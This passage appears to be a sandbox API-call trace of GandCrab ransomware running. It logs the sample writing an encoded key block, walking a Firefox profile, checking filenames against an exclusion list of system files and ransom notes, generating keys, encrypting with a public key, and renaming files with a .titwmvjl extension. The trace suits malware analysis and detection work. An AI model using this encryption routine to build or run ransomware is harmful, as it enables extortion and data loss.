73\x6f\x4d\x72\x30\x50\x6f\x61\x38\x6b\x4a\x5a\x54\x56\x68\x66\x33\x77\x54\x2f\x75\x75\x79\x64\x4d\x79\x55\x70\x63\x6c\x53\x49\x6a\x71\x2b\x66\x55\x49\x52\x72\x2b\x37\x6b\x2f\x57\x39\x4f\x39\x56\x73\x79\x32\x4e\x63\x78\x35\x70\x66\x2b\x53\x2b\x4d\x72\x4c\x31\x41\x6d\x35\x52\x51\x69\x33\x63\x36\x78\x46\x65\x54\x78\x33\x4d\x63\x5a\x52\x38\x30\x6e\x56\x69\x6e\x68\x75\x59\x6c\x69\x52\x51\x68\x4b\x4e\x6f\x4e\x57\x49\x32\x67\x48\x61\x47\x36\x6c\x52\x75\x7a\x2b\x51\x68\x47\x30\x52\x70\x4d\x59\x62\x7a\x42\x67\x4f\x6a\x35\x68\x69\x2f\x63\x63\x79\x55\x79\x68\x4d\x35\x66\x55\x49\x67\x63\x4a\x31\x39\x6c\x50\x64\x63\x6d\x76\x69\x78\x47\x6c\x6b\x35\x52\x38\x72\x6b\x32\x5a\x66\x78\x68\x4a\x78\x72\x46\x49\x75\x4c\x51\x54\x73\x52\x72\x61\x69\x77\x63\x44\x4d\x54\x41\x6d\x39\x63\x38\x6b\x64\x72\x2f\x59\x66\x34\x51\x6e\x2b\x62\x76\x37\x79\x4a\x5a\x34\x59\x58\x67\x42\x38\x45\x64\x6c\x31\x58\x64\x53\x6e\x4d\x72\x55\x50\x56\x35\x6f\x72\x63\x42\x78\x33\x32\x65\x73\x48\x6c\x31\x62\x46\x48\x6b\x65\x73\x39\x5a\x39\x66\x77\x6a\x46\x46\x78\x35\x42\x2f\x43\x72\x79\x6e\x36\x49\x30\x62\x54\x68\x36\x53\x78\x71\x78\x53\x4d\x4b\x66\x61\x77\x6c\x59\x6a\x57\x52\x79\x70\x35\x79\x58\x74\x4e\x69\x62\x62\x2b\x63\x7a\x78\x54\x77\x67\x30\x35\x57\x45\x56\x69\x44\x6a\x32\x5a\x4d\x35\x56\x46\x45\x35\x67\x39\x6a\x56\x78\x31\x7a\x4c\x67\x4c\x36\x72\x45\x6f\x78\x76\x62\x50\x33\x2f\x6f\x57\x73\x72\x33\x72\x72\x35\x38\x63\x71\x62\x45\x36\x49\x49\x48\x34\x6b\x33\x74\x74\x34\x75\x37\x69\x71\x7a\x66\x55\x6b\x4a\x6d\x48\x2b\x38\x31\x76\x5a\x62\x56\x7a\x59\x48\x63\x36\x48\x51\x4c\x2f\x56\x4c\x6d\x74\x2b\x59\x37\x68\x52\x6b\x36\x79\x6f\x72\x53\x6a\x31\x70\x6d\x69\x50\x46\x72\x58\x4c\x39\x39\x57\x72\x62\x6c\x41\x59\x36\x4e\x71\x79\x68\x32\x6d\x78\x2f\x6a\x4b\x44\x58\x4d\x5a\x7a\x64\x6c\x55\x51\x32\x4d\x35\x67\x6a\x56\x6c\x38\x36\x6c\x4e\x43\x6f\x33\x37\x4c\x44\x4c\x56\x48\x55\x4a\x64\x38\x73\x75\x41\x37\x78\x48\x61\x76\x47\x4b\x4d\x42\x7a\x7a\x78\x38\x35\x70\x2b\x4a\x2f\x55\x56\x39\x57\x50\x58\x6e\x72\x75\x45\x41\x3d\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x47\x41\x4e\x44\x43\x52\x41\x42\x20\x4b\x45\x59\x2d\x2d\x2d\x0d\x0a\x0d\x0a\x2d\x2d\x2d\x42\x45\x47\x49\x4e\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d\x0d\x0a\x37\x66\x74\x44\x45\x67\x4c\x62\x2f\x5a\x53\x30\x6c\x63\x6d\x5a\x62\x48\x4d\x36\x31\x4b\x4c\x4a\x78\x51\x4f\x70\x44\x35\x34\x4b\x6b\x77\x36\x53\x62\x73\x73\x67\x66\x33\x59\x41\x57\x4f\x4d\x43\x79\x70\x2b\x4b\x59\x42\x78\x78\x47\x32\x44\x64\x39\x4d\x50\x4a\x45\x70\x44\x37\x41\x73\x6d\x56\x67\x4f\x43\x39\x52\x57\x66\x49\x52\x48\x51\x70\x51\x78\x47\x61\x31\x4c\x50\x47\x7a\x72\x45\x53\x47\x2b\x67\x67\x61\x72\x47\x58\x6f\x36\x62\x63\x47\x50\x4d\x70\x59\x30\x75\x48\x49\x6b\x6d\x67\x32\x38\x51\x55\x71\x68\x54\x73\x67\x6b\x67\x59\x58\x56\x70\x69\x44\x63\x46\x77\x69\x58\x48\x2f\x67\x6c\x4b\x56\x57\x6f\x56\x48\x4b\x43\x50\x5a\x4d\x70\x76\x37\x34\x43\x5a\x32\x4f\x38\x51\x33\x7a\x57\x61\x78\x30\x4b\x49\x52\x43\x2f\x6f\x76\x45\x74\x76\x42\x6d\x64\x6c\x53\x73\x70\x6d\x48\x4e\x76\x55\x46\x49\x4b\x6c\x30\x57\x59\x4e\x61\x41\x79\x77\x30\x53\x4b\x36\x62\x44\x4c\x6c\x46\x33\x79\x50\x71\x42\x35\x67\x6d\x61\x62\x46\x2b\x5a\x2f\x58\x4d\x47\x64\x33\x73\x67\x44\x37\x32\x35\x4a\x33\x2f\x55\x77\x42\x37\x77\x39\x78\x45\x57\x4c\x30\x79\x37\x34\x58\x71\x35\x33\x74\x48\x52\x6e\x4b\x53\x4d\x4a\x2b\x42\x6c\x31\x44\x7a\x65\x69\x71\x6f\x39\x46\x72\x64\x6e\x4d\x4b\x5a\x37\x31\x39\x47\x53\x56\x66\x4f\x2b\x54\x41\x69\x6d\x4c\x72\x37\x73\x34\x43\x75\x47\x41\x73\x70\x43\x61\x6a\x71\x52\x54\x77\x56\x66\x50\x66\x32\x30\x78\x42\x53\x55\x69\x44\x49\x74\x4c\x4f\x4a\x64\x4e\x41\x46\x42\x6e\x56\x71\x72\x4d\x5a\x6f\x52\x2b\x53\x33\x4e\x4c\x47\x59\x6d\x64\x61\x52\x33\x30\x66\x52\x50\x39\x33\x79\x71\x50\x4d\x77\x4c\x4f\x4c\x6a\x54\x36\x4f\x36\x72\x31\x78\x57\x34\x65\x5a\x78\x54\x7a\x50\x4a\x31\x66\x62\x44\x4c\x30\x39\x30\x30\x50\x66\x36\x53\x30\x61\x7a\x37\x4b\x41\x76\x6f\x54\x66\x46\x70\x35\x32\x47\x50\x44\x4b\x78\x35\x43\x68\x42\x75\x64\x72\x6f\x4d\x31\x6f\x4f\x36\x69\x71\x56\x77\x75\x6d\x32\x71\x42\x6c\x76\x5a\x4c\x77\x4b\x72\x74\x4d\x79\x70\x53\x38\x45\x31\x66\x6d\x6c\x58\x7a\x6d\x5a\x37\x71\x64\x34\x42\x75\x77\x75\x67\x57\x43\x77\x59\x30\x7a\x56\x62\x35\x51\x66\x76\x64\x78\x47\x4c\x53\x75\x6a\x37\x62\x69\x41\x77\x44\x50\x69\x71\x54\x4f\x4c\x4b\x50\x47\x67\x6a\x34\x32\x59\x57\x4b\x62\x2b\x2b\x41\x6c\x53\x76\x48\x75\x69\x7a\x34\x45\x59\x45\x71\x42\x45\x36\x69\x4e\x6e\x41\x4e\x66\x68\x77\x4e\x51\x4c\x49\x45\x7a\x31\x52\x6b\x48\x4b\x79\x62\x75\x4d\x4b\x70\x31\x52\x31\x6c\x51\x2f\x70\x75\x51\x65\x65\x7a\x77\x45\x69\x58\x54\x45\x43\x72\x37\x72\x0d\x0a\x2d\x2d\x2d\x45\x4e\x44\x20\x50\x43\x20\x44\x41\x54\x41\x2d\x2d\x2d") returned 4273 [0079.970] WriteFile (in: hFile=0x2cc, lpBuffer=0x2300000*, nNumberOfBytesToWrite=0x2162, lpNumberOfBytesWritten=0x259e824, lpOverlapped=0x0 | out: lpBuffer=0x2300000*, lpNumberOfBytesWritten=0x259e824*=0x2162, lpOverlapped=0x0) returned 1 [0079.971] CloseHandle (hObject=0x2cc) returned 1 [0079.971] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.971] VirtualAlloc (lpAddress=0x0, dwSize=0x410, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.971] GetSystemTime (in: lpSystemTime=0x25d0400 | out: lpSystemTime=0x25d0400*(wYear=0x7e3, wMonth=0x2, wDayOfWeek=0x1, wDay=0x12, wHour=0x11, wMinute=0x13, wSecond=0x19, wMilliseconds=0x118)) [0079.971] VirtualAlloc (lpAddress=0x0, dwSize=0xe0c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.972] GetWindowsDirectoryW (in: lpBuffer=0x2630000, uSize=0x100 | out: lpBuffer="C:\\Windows") returned 0xa [0079.972] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x2630200, nVolumeNameSize=0x100, lpVolumeSerialNumber=0x2630600, lpMaximumComponentLength=0x2630608, lpFileSystemFlags=0x2630604, lpFileSystemNameBuffer=0x2630400, nFileSystemNameSize=0x100 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x2630600*=0xd2ca4def, lpMaximumComponentLength=0x2630608*=0xff, lpFileSystemFlags=0x2630604*=0x3e700ff, lpFileSystemNameBuffer="NTFS") returned 1 [0079.972] wsprintfW (in: param_1=0x25d0000, param_2="%s%x%x%x%x.lock" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\d2ca4a09d2ca4deb61a.lock") returned 104 [0079.972] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\d2ca4a09d2ca4deb61a.lock" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\d2ca4a09d2ca4deb61a.lock"), dwDesiredAccess=0x40000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000002, hTemplateFile=0x0) returned 0x2cc [0079.973] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.973] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.973] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\") returned 80 [0079.973] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="*" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*" [0079.973] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\*", fInfoLevelId=0x1, lpFindFileData=0x259e840, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x259e840) returned 0x5033f8 [0079.974] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.974] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0079.975] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.975] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.975] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0079.975] lstrcmpW (lpString1="addons.json", lpString2=".") returned 1 [0079.975] lstrcmpW (lpString1="addons.json", lpString2="..") returned 1 [0079.975] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="addons.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json" [0079.975] lstrlenW (lpString=".titwmvjl") returned 9 [0079.975] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json") returned 91 [0079.975] VirtualAlloc (lpAddress=0x0, dwSize=0xf6, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0079.976] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json.titwmvjl") returned 100 [0079.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json") returned 91 [0079.976] lstrlenW (lpString=".json") returned 5 [0079.976] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.976] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".json ") returned 6 [0079.976] lstrcmpiW (lpString1=".json", lpString2=".titwmvjl") returned -1 [0079.976] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json") returned 91 [0079.976] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json") returned 91 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="desktop.ini") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="autorun.inf") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="ntuser.dat") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="iconcache.db") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="bootsect.bak") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="boot.ini") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="ntuser.dat.log") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="thumbs.db") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="KRAB-DECRYPT.html") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="CRAB-DECRYPT.html") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="KRAB-DECRYPT.txt") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="CRAB-DECRYPT.txt") returned -1 [0079.976] lstrcmpiW (lpString1="addons.json", lpString2="ntldr") returned -1 [0079.977] lstrcmpiW (lpString1="addons.json", lpString2="NTDETECT.COM") returned -1 [0079.977] lstrcmpiW (lpString1="addons.json", lpString2="Bootfont.bin") returned -1 [0079.977] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json") returned 91 [0079.977] lstrlenW (lpString=".json") returned 5 [0079.977] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.977] wsprintfW (in: param_1=0x2630000, param_2="%s " | out: param_1=".json ") returned 6 [0079.977] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.977] VirtualAlloc (lpAddress=0x0, dwSize=0x21c, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0079.977] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\addons.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x88000000, hTemplateFile=0x0) returned 0x2d4 [0079.979] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xfffffde4, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 0 [0079.980] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.980] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0079.982] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.983] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.983] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.983] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x20, pbBuffer=0x259e748 | out: pbBuffer=0x259e748) returned 1 [0079.983] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.983] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.983] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.983] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.983] CryptAcquireContextW (in: phProv=0x259e6bc, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6bc*=0x4cdb38) returned 1 [0079.986] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x2650000 [0079.986] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77550000 [0079.986] GetProcAddress (hModule=0x77550000, lpProcName="CryptGenRandom") returned 0x77570df0 [0079.986] CryptGenRandom (in: hProv=0x4cdb38, dwLen=0x8, pbBuffer=0x259e768 | out: pbBuffer=0x259e768) returned 1 [0079.987] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.987] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.987] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0079.987] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.987] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0079.991] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.991] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503738) returned 1 [0079.992] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.992] CryptGetKeyParam (in: hKey=0x503738, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0079.992] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.992] CryptEncrypt (in: hKey=0x503738, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630000*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630000*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0079.992] GetLastError () returned 0x0 [0079.992] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.992] CryptDestroyKey (hKey=0x503738) returned 1 [0079.993] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.993] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.993] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.993] CryptAcquireContextW (in: phProv=0x259e6b0, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x259e6b0*=0x4cdb38) returned 1 [0079.995] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.996] CryptImportKey (in: hProv=0x4cdb38, pbData=0x1e40000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x259e6b4 | out: phKey=0x259e6b4*=0x503278) returned 1 [0079.996] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.996] CryptGetKeyParam (in: hKey=0x503278, dwParam=0x8, pbData=0x259e6a8, pdwDataLen=0x259e6ac, dwFlags=0x0 | out: pbData=0x259e6a8*=0x800, pdwDataLen=0x259e6ac*=0x4) returned 1 [0079.996] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.996] CryptEncrypt (in: hKey=0x503278, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2630100*, pdwDataLen=0x259e6e0*=0xc8, dwBufLen=0x100 | out: pbData=0x2630100*, pdwDataLen=0x259e6e0*=0x100) returned 1 [0079.996] GetLastError () returned 0x0 [0079.996] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.996] CryptDestroyKey (hKey=0x503278) returned 1 [0079.996] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x77550000 [0079.996] CryptReleaseContext (hProv=0x4cdb38, dwFlags=0x0) returned 1 [0079.996] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x2650000 [0079.997] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x2760000 [0079.997] ReadFile (in: hFile=0x2d4, lpBuffer=0x2650000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x259e78c, lpOverlapped=0x0 | out: lpBuffer=0x2650000*, lpNumberOfBytesRead=0x259e78c*=0x18, lpOverlapped=0x0) returned 1 [0080.009] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0xffffffe8, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0080.010] WriteFile (in: hFile=0x2d4, lpBuffer=0x2760000*, nNumberOfBytesToWrite=0x18, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2760000*, lpNumberOfBytesWritten=0x259e770*=0x18, lpOverlapped=0x0) returned 1 [0080.017] SetFilePointerEx (in: hFile=0x2d4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0080.017] WriteFile (in: hFile=0x2d4, lpBuffer=0x2630000*, nNumberOfBytesToWrite=0x21c, lpNumberOfBytesWritten=0x259e770, lpOverlapped=0x0 | out: lpBuffer=0x2630000*, lpNumberOfBytesWritten=0x259e770*=0x21c, lpOverlapped=0x0) returned 1 [0080.019] VirtualFree (lpAddress=0x2650000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.022] VirtualFree (lpAddress=0x2760000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.023] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.023] CloseHandle (hObject=0x2d4) returned 1 [0080.025] MoveFileExW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\addons.json"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\addons.json.titwmvjl" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\roaming\\mozilla\\firefox\\profiles\\8i341t8m.default\\addons.json.titwmvjl"), dwFlags=0x1) returned 1 [0080.026] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.026] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.026] lstrcmpW (lpString1="AlternateServices.txt", lpString2=".") returned 1 [0080.026] lstrcmpW (lpString1="AlternateServices.txt", lpString2="..") returned 1 [0080.026] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="AlternateServices.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\AlternateServices.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\AlternateServices.txt" [0080.026] lstrlenW (lpString=".titwmvjl") returned 9 [0080.026] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\AlternateServices.txt") returned 101 [0080.026] VirtualAlloc (lpAddress=0x0, dwSize=0x10a, flAllocationType=0x3000, flProtect=0x4) returned 0x25d0000 [0080.026] wsprintfW (in: param_1=0x25d0000, param_2="%s%s" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\AlternateServices.txt.titwmvjl") returned 110 [0080.026] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\AlternateServices.txt") returned 101 [0080.026] lstrlenW (lpString=".txt") returned 4 [0080.026] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2630000 [0080.026] wsprintfW (in: param_1=0x2630000, param_2="%ws " | out: param_1=".txt ") returned 5 [0080.026] lstrcmpiW (lpString1=".txt", lpString2=".titwmvjl") returned 1 [0080.027] VirtualFree (lpAddress=0x2630000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.027] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\AlternateServices.txt") returned 101 [0080.027] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\AlternateServices.txt") returned 101 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="desktop.ini") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="autorun.inf") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="ntuser.dat") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="iconcache.db") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="bootsect.bak") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="boot.ini") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="ntuser.dat.log") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="thumbs.db") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="TITWMVJL-DECRYPT.txt") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="TITWMVJL-DECRYPT.html") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="KRAB-DECRYPT.html") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="CRAB-DECRYPT.html") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="KRAB-DECRYPT.txt") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="CRAB-DECRYPT.txt") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="ntldr") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="NTDETECT.COM") returned -1 [0080.027] lstrcmpiW (lpString1="AlternateServices.txt", lpString2="Bootfont.bin") returned -1 [0080.027] VirtualFree (lpAddress=0x25d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0080.027] FindNextFileW (in: hFindFile=0x5033f8, lpFindFileData=0x259e840 | out: lpFindFileData=0x259e840) returned 1 [0080.027] lstrcmpW (lpString1="blocklist-addons.json", lpString2=".") returned 1 [0080.027] lstrcmpW (lpString1="blocklist-addons.json", lpString2="..") returned 1 [0080.027] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\", lpString2="blocklist-addons.json" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json") returned="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\8i341t8m.default\\blocklist-addons.json" [0080.027] lstrlenW (lpString=".titwmvjl") returned 9 [0080.027] lstrlenW 